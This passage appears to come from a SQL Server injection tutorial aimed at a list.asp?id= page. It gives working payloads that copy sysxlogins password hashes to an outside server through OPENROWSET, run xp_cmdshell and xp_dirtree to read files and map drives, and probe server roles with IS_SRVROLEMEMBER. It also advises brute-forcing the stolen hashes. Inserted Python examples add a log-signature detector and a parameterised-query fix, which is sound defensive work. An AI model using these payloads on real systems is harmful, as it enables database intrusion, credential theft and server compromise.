The essence of the Code is as follows:
The following is a reference clip:
insert into OPENROWSET('sqloledb', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins
After obtaining the hash, you can perform brute-force cracking. This requires a lot of luck and time.
How to traverse a directory:
First create a temporary table named temp:
The following is a reference clip:
5'; create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
5'; insert temp exec master.dbo.xp_availablemedia;-- get all current drives
5'; insert into temp (id) exec master.dbo.xp_subdirs 'C:';-- get the subdirectory list
5'; insert into temp (id, num1) exec master.dbo.xp_dirtree 'C:';-- get the directory tree of all subdirectories and import it into the temp table
5'; insert into temp (id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- view the content of a file
5'; insert into temp (id) exec master.dbo.xp_cmdshell 'dir c:\';--
5'; insert into temp (id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s';--
5'; insert into temp (id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc';--
5'; insert into temp (id, num1) exec master.dbo.xp_dirtree 'C:';-- (xp_dirtree is executable by the PUBLIC role, so it needs no elevated permission)
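The defender's counterpart to the statements above and to the OPENROWSET statement at the top of the page is to recognise them in the web server's own logs. The following Python is an added example, not part of the original article: it URL-decodes the query string of each log line and flags requests carrying the signatures this page shows (extended stored procedure calls, OPENROWSET, role probes, stacked statements, a trailing comment). The log lines are constructed samples in an IIS-style W3C layout, and the field order is an assumption; the signature list is drawn from the statements on this page.

```python
"""Detection logic for the injection strings shown on this page, run over
constructed web-server log lines. Added example, not part of the original page."""
import re
from urllib.parse import unquote_plus

# Signatures for the techniques shown above: extended stored procedures called
# through stacked queries, OPENROWSET exfiltration, role probing, and the
# trailing comment used to discard the rest of the original query.
SIGNATURES = {
    "xp_extended_proc": re.compile(r"\bxp_(cmdshell|dirtree|subdirs|availablemedia)\b", re.I),
    "openrowset": re.compile(r"\bopenrowset\s*\(", re.I),
    "role_probe": re.compile(r"\bis_(srvrolemember|member)\s*\(", re.I),
    "stacked_ddl": re.compile(r";\s*(create|insert|drop)\s+", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}

# Constructed sample in W3C extended format (IIS style); the field order is an assumption.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-05-12 10:01:02 10.0.0.7 GET /down/list.asp id=1 200
2003-05-12 10:01:09 10.0.0.7 GET /down/list.asp id=5%27%3B+insert+into+temp+(id)+exec+master.dbo.xp_dirtree+%27C%3A%27-- 500
2003-05-12 10:01:15 10.0.0.7 GET /down/list.asp id=1+and+1%3D(select+IS_SRVROLEMEMBER(%27sysadmin%27))-- 200
2003-05-12 10:02:00 10.0.0.9 GET /down/list.asp id=2 200
2003-05-12 10:02:31 10.0.0.7 GET /down/list.asp id=1%3Binsert+into+OPENROWSET(%27sqloledb%27,%27uid%3Dsa%3Bpwd%3Dx%3BAddress%3D192.0.2.1,1433%3B%27,%27select+*+from+_sysxlogins%27)+select+*+from+master.dbo.sysxlogins-- 500
"""


def normalize(query_string):
    """URL-decode twice (to catch double-encoded payloads) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(query_string))
    return re.sub(r"\s+", " ", decoded).strip()


def classify(query_string):
    """Return the signature names matched by one query string, in SIGNATURES order."""
    text = normalize(query_string)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_log(lines):
    """Parse W3C-style lines; return (client_ip, uri_stem, decoded_query, hits) for matching requests."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):
            continue  # skip W3C directive lines such as #Fields
        parts = line.split()
        if len(parts) < 7:
            continue  # malformed line; field layout assumed as in SAMPLE_LOG
        client_ip, uri_stem, query = parts[2], parts[4], parts[5]
        hits = classify(query)
        if hits:
            findings.append((client_ip, uri_stem, normalize(query), hits))
    return findings


def suspicious_clients(lines):
    """Count matching requests per client address; repeated probes from one source are the usual shape."""
    counts = {}
    for client_ip, _stem, _query, _hits in scan_log(lines):
        counts[client_ip] = counts.get(client_ip, 0) + 1
    return counts


if __name__ == "__main__":
    for client_ip, stem, query, hits in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{client_ip} {stem} {hits}\n    {query}")
    print(suspicious_clients(SAMPLE_LOG.splitlines()))
```

Decoding twice matters because the `+`, `%27` and `%3B` forms in the sample are exactly what a browser or tool emits for the spaces, quotes and semicolons in the statements above, and a second layer of encoding is a common way of slipping past a single-pass filter. Matching on the decoded text rather than on the raw query string keeps the signatures short and readable.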
Write table:
The following is a reference clip:
Statement 1: http://www.bkjia.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
Statement 2: http://www.bkjia.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
Statement 3: http://www.bkjia.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
Statement 4: http://www.bkjia.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
Statement 5: http://www.bkjia.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
Statement 6: http://www.bkjia.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
Statement 7: http://www.bkjia.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
Statement 8: http://www.bkjia.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
Statement 9: http://www.bkjia.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--
Write the path to the table:
The following is a reference clip:
http://www.bkjia.com/down/list.asp?id=1; create table dirs (paths varchar(100), id int)--
http://www.bkjia.com/down/list.asp?id=1; insert dirs exec master.dbo.xp_dirtree 'C:'--
http://www.bkjia.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
http://www.bkjia.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('@inetpub'))--
Statement: http://www.bkjia.com/down/list.asp?id=1; create table dirs1 (paths varchar(100), id int)--
Statement: http://www.bkjia.com/down/list.asp?id=1; insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
Statement: http://www.bkjia.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)--
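The role probes and the path-reading statements above all rest on one defect: list.asp splices the id parameter straight into the SQL text, so the application's found/not-found response becomes a yes/no oracle on whatever condition the request appends. The following Python is an added example, not the page's code: sqlite3 stands in for SQL Server, IS_SRVROLEMEMBER is emulated with a user-defined function so that the page's own probe string can be run, the downloads table and its rows are constructed, and the hardened lookup shows that validating the type and binding the value as a parameter removes the oracle entirely.

```python
"""Vulnerable and hardened versions of the list.asp?id= lookup. Added example with
sqlite3 standing in for the MSSQL back end; IS_SRVROLEMEMBER is emulated and the
table contents are constructed. Not the original page's code."""
import sqlite3


def make_db():
    """Build an in-memory stand-in for the downloads table behind list.asp (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table downloads (id integer primary key, name text)")
    conn.executemany("insert into downloads values (?, ?)",
                     [(1, "manual.pdf"), (2, "setup.exe")])
    # Stand-in for SQL Server's IS_SRVROLEMEMBER: pretend the connection runs as sysadmin.
    conn.create_function("IS_SRVROLEMEMBER", 1, lambda role: 1 if role == "sysadmin" else 0)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern behind list.asp?id=...: user input spliced straight into the SQL text."""
    sql = "select name from downloads where id = " + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(conn, raw_id):
    """Validate the type, then bind the value as a parameter; the input is never parsed as SQL."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return None  # reject anything that is not an integer id
    row = conn.execute("select name from downloads where id = ?", (id_value,)).fetchone()
    return row[0] if row else None


# The page's probe shape: the row comes back only when the appended condition is true,
# which turns the application's found/not-found behaviour into a yes/no oracle.
PROBE_TRUE = "1 and 1=(select IS_SRVROLEMEMBER('sysadmin'))"
PROBE_FALSE = "1 and 1=(select IS_SRVROLEMEMBER('diskadmin'))"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, sysadmin probe :", lookup_vulnerable(db, PROBE_TRUE))   # manual.pdf: oracle says yes
    print("vulnerable, diskadmin probe:", lookup_vulnerable(db, PROBE_FALSE))  # None: oracle says no
    print("hardened, sysadmin probe   :", lookup_hardened(db, PROBE_TRUE))     # None: rejected, nothing evaluated
    print("hardened, plain id         :", lookup_hardened(db, "1"))            # manual.pdf
```

The same fix covers the stacked statements earlier on the page (`5'; create table ...`, `; insert dirs exec ...`): once the value is bound as a parameter, the closing quote, the semicolon and the trailing comment are just characters in a string the database compares against the id column, never SQL it executes. Type validation before the query is the second layer; for an integer id it costs one line and rejects every statement on this page before the database sees it.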